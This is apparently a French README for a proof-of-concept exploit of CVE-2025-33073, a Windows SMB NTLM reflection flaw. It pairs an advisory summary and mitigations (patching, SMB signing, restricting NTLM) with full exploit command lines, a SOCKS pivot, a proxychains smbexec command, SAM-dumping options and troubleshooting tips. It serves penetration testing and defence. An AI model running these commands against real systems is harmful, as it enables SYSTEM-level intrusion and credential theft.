
CVE-2025-33073
🔥 Exécution de code à distance authentifiée de haute sévérité 🔥 Contrôle d'accès inapproprié dans le client SMB Windows (CWE-284)
| Aspect | Détails |
|---|
| Score CVSS v3.1 | 8.8 (Élevé) 🔥 |
| Systèmes affectés | Windows 10, 11, Server 2012–2025 (toutes éditions) 💻 |
| Date de divulgation | 10 juin 2025 📅 (Corrigé dans le Patch Tuesday de juin 2025) |
| Exploitation | Activement exploitée dans la nature 😱 Ajouté au CISA KEV le 21 octobre 2025 |
| Vecteur d'attaque | Réseau (Authentifié) 🌐 |
| Impact | Exécution de code au niveau SYSTEM 👑 Mouvement latéral via relais Kerberos |
| Contournement | Contournement des mesures d'atténuation de réflexion NTLM ⚡ |
Corrigez maintenant ! 🔧
→ Appliquez les mises à jour Microsoft (ex. KB5060998)
→ Guide de mise à jour Microsoft 🔗
Activez la signature SMB ✍️
→ Appliquez sur tous les clients et serveurs
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
Restreindre NTLM 🚫
→ Bloquez NTLM si possible
→ Surveillez les tentatives de relais avec des outils EDR
Correction automatisée ? 🤖
→ Utilisez Vicarius vRx ou des scripts personnalisés pour une correction de masse
Statut au 15 novembre 2025 :
✅ Corrigé
❌ Toujours exploitée sur les systèmes non corrigés
🔔 Date limite CISA : 10 novembre 2025 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

Commande personnalisée Au lieu d'exécuter secretsdump, une commande personnalisée peut être exécutée.
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS Pour une exécution plus furtive des commandes après qu'une connexion valide en tant que SYSTEM a été établie. --target et --target-ip doivent être égaux ici.
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

Une commande personnalisée peut également être exécutée via proxychains au lieu de vider la SAM.
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

Si vous êtes dans le même domaine de diffusion que l'appareil et qu'il est vulnérable à l'empoisonnement LLMNR, il est possible d'exploiter un appareil sans avoir à enregistrer un enregistrement DNS.

J'ai parfois constaté que l'attaque ne fonctionne pas parce que le nom d'hôte est utilisé pour l'attaque, ce qui entraîne une requête DNS depuis Kali. Si Kali n'utilise pas le serveur DNS ou si vous recevez un message '/ FAILED' de impacket-ntlmrelayx, essayez d'ajouter l'hôte à votre fichier /etc/hosts. Cela devrait permettre à l'attaque de fonctionner.
Si vous utilisez l'IP, l'attaque devrait fonctionner. Parfois, l'exécuter plusieurs fois aboutit à un SUCCÈS au lieu d'un échec. La raison n'est pas encore parfaitement claire. Je pense que cela a à voir avec le réseau.
Essayez une autre méthode de coercition en utilisant -M ou --method.
Authentification NTLM locale effectuée

Authentification NTLM locale non effectuée, résultant en une tentative ÉCHOUÉE

N'attendez pas — corrigez aujourd'hui ! 🛑
La sécurité de votre réseau en dépend. 💪